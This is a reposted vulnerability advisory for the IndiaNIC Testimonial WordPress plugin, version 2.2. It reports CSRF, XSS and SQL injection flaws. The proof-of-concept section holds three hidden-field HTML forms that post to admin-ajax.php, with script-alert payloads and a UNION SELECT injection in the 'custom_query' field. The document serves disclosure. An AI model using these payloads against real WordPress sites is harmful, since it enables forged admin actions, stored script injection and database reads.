网站地图    收藏   

主页 > 后端 > 网站安全 >

Wordpress插件IndiaNIC Testimonial多个缺陷 - 网站安全

来源:自学PHP网    时间:2015-04-17 10:15 作者: 阅读:

[导读] Details========================程序: Testimonial版本: 2.2类型: Wordpress plugin作者: IndiaNIC缺陷类别:- XSS (CWE-79)- CSRF (CWE-352)- SQL Injection (CWE-89)概述========================......

Details
========================
程序: Testimonial
版本: 2.2
类型: Wordpress plugin
作者: IndiaNIC
缺陷类别:
- XSS (CWE-79)
- CSRF (CWE-352)
- SQL Injection (CWE-89)
 
概述
========================
Testimonial Plugin allows you to add, delete, edit and place what others said about your web site. Loaded with unequaled features, this plugin gets you complete control over testimonials.
 
This is the very first Plug-in which is designed especially keeping our motto in mind that ‘every client is important’. It is as an imperative tool for supervising your official website in accordance to your clients.
 
缺陷
========================
This plugin is vulnerable to cross-site request forgery, cross-site scripting and sql injection.
 
1. Add testimonial form is vulnerable to CSRF and XSS
2. Add listings template is vulnerable to CSRF, XSS and SQLi
3. Add widget template is vulnerable to CSRF and XSS
 
测试证明

========================
1. Add testimonial 
<form name="testimonial_add" method="post" action="http://wordpress/wp-admin/admin-ajax.php">
    <input type="hidden" name="action" value="iNIC_testimonial_save">
    <input type="hidden" name="project_name" value="<script>alert(String.fromCharCode(67,83,82,70,32,49))</script>">
    <input type="hidden" name="project_url" value="<script>alert(String.fromCharCode(67,83,82,70,32,50))</script>">
    <input type="hidden" name="client_name" value="<script>alert(String.fromCharCode(67,83,82,70,32,51))</script>">
    <input type="hidden" name="client_city" value="<script>alert(String.fromCharCode(67,83,82,70,32,52))</script>">
    <input type="hidden" name="client_state" value="<script>alert(String.fromCharCode(67,83,82,70,32,53))</script>">
    <input type="hidden" name="client_country" value="Belgium">
    <input type="hidden" name="description" value="<script>alert(String.fromCharCode(67,83,82,70,32,54))</script>">
    <input type="hidden" name="tags" value="<script>alert(String.fromCharCode(67,83,82,70,32,55))</script>">
    <input type="hidden" name="video_url" value="<script>alert(String.fromCharCode(67,83,82,70,32,56))</script>">
    <input type="hidden" name="is_featured" value="<script>alert(String.fromCharCode(67,83,82,70,32,57))</script>">
    <input type="submit" value="Save Testimonial">
</form>
 
2. Add listings template
<form name="testimonial_add" method="post" action="http://wordpress/wp-admin/admin-ajax.php">
    <input type="hidden" name="action" value="iNIC_testimonial_save_listing_template">
    <input type="hidden" name="id" value="9">
    <input type="hidden" name="title" value="<script>alert(String.fromCharCode(67,83,82,70,32,49))</script>">
    <input type="hidden" name="no_of_testimonial" value="5">
    <input type="hidden" name="list_per_page" value="5">
    <input type="hidden" name="ord_by" value="id">
    <input type="hidden" name="ord_type" value="ASC">
    <input type="hidden" name="custom_query" value="1=1) union select 1,2,3,@@version,5,6,7,8,9,10,11,12,13,14#">
    <input type="hidden" name="show_featured_at" value="top">
    <input type="hidden" name="no_of_featured" value="2">
    <input type="hidden" name="featured_template" value="{#ID} {#ProjectUrl} {#ProjectName} {#ProjectUrl} {#ClientName} {#City} {#State} {#Country} {#Description} {#Tags} {#VideoUrl} {#ThumbImgUrl} {#LargeImgUrl} {#Counter}">
    <input type="hidden" name="listing_template_odd" value="{#ID} {#ProjectUrl} {#ProjectName} {#ProjectUrl} {#ClientName} {#City} {#State} {#Country} {#Description} {#Tags} {#VideoUrl} {#ThumbImgUrl} {#LargeImgUrl} {#Counter}">
    <input type="hidden" name="listing_template_even" value="{#ID} {#ProjectUrl} {#ProjectName} {#ProjectUrl} {#ClientName} {#City} {#State} {#Country} {#Description} {#Tags} {#VideoUrl} {#ThumbImgUrl} {#LargeImgUrl} {#Counter}">
    <input type="submit" value="Add Template">
</form>
 
3. Add widget template
<form name="testimonial_add" method="post" action="http://wordpress/wp-admin/admin-ajax.php">
    <input type="hidden" name="action" value="iNIC_testimonial_save_widget">
    <input type="hidden" name="widget_title" value="<script>alert(String.fromCharCode(67,83,82,70,32,49))</script>">
    <input type="hidden" name="no_of_testimonials" value="<script>alert(String.fromCharCode(67,83,82,70,32,50))</script>">
    <input type="hidden" name="filter_by_country" value="<script>alert(String.fromCharCode(67,83,82,70,32,51))</script>">
    <input type="hidden" name="filter_by_tags" value="<script>alert(String.fromCharCode(67,83,82,70,32,52))</script>">
    <input type="hidden" name="widget_template" value="<script>alert(String.fromCharCode(67,83,82,70,32,53))</script>">
    <input type="submit" value="Add Template">
</form>
 
解决方案
========================
No patch has been provided by vendor. Solution would be to stop using this plugin in a public environment

 

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论